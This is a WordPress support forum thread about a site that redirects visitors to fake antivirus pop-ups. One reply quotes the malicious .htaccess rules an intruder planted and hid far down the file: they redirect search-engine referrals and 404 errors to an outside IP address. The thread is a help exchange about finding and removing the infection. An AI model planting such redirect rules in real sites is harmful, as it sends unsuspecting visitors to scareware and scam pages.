Hacked by some antiVirus pop up

  • tridean

    (@tridean)


    15 years, 9 months ago

    Hi All,
    I just installed WordPress on my server (through Fantastico/cpanel), and so it is the latest version 2.6

    I was editing my theme when all of a sudden when I click on ‘update’, the page went to the following URL
    http://www.penbuddies.com/inc/temp/i.html

    then is popped up some antivirus window, and then the first URL forwarded on to some other web site with more antivirus nonsense on it. I’m sure most of you are familiar with the type of antivirus pop up crap.

    anyway, was wondering how this could have happened only 2 hours after first installing, it and how I can get rid of it

    Cheers
    Dean

Viewing 3 replies - 1 through 3 (of 3 total)
  • billunger

    (@billunger)

    15 years, 7 months ago

    Did anyone figure this out? A bunch of my links are now doing the same thing…

    billunger

    (@billunger)

    15 years, 7 months ago

    Nevermind… I just found this on another site:

    Well in case anyone finds they have the same issue, I have resolved it and am letting you all know how I found it.

    It was obvious someone got access to my server, so I have changed my password.

    Once in they added the following code to my .htaccess file

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
    Errordocument 404 http://87.248.180.88/in.html?s=hg_err

    They also placed it so far down you had to scroll down for ages to get to it. This is why I missed it the first time.

    So there you have it. Thank god as it has saved me a lot of money!!!

    milehightechguy

    (@milehightechguy)

    14 years, 10 months ago

    Once I test it out (to see if it works with 2.8) I’m going to add this to the list of resources where I’ve outlined several security measures for hardening WordPress:

    http://milehightechguy.com/how-to-guide-for-securing-wordpress-and-protecting-websites/

    If your site has been hacked, or you need more security for your WordPress installation (we all do), then check it out.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Hacked by some antiVirus pop up’ is closed to new replies.

Tags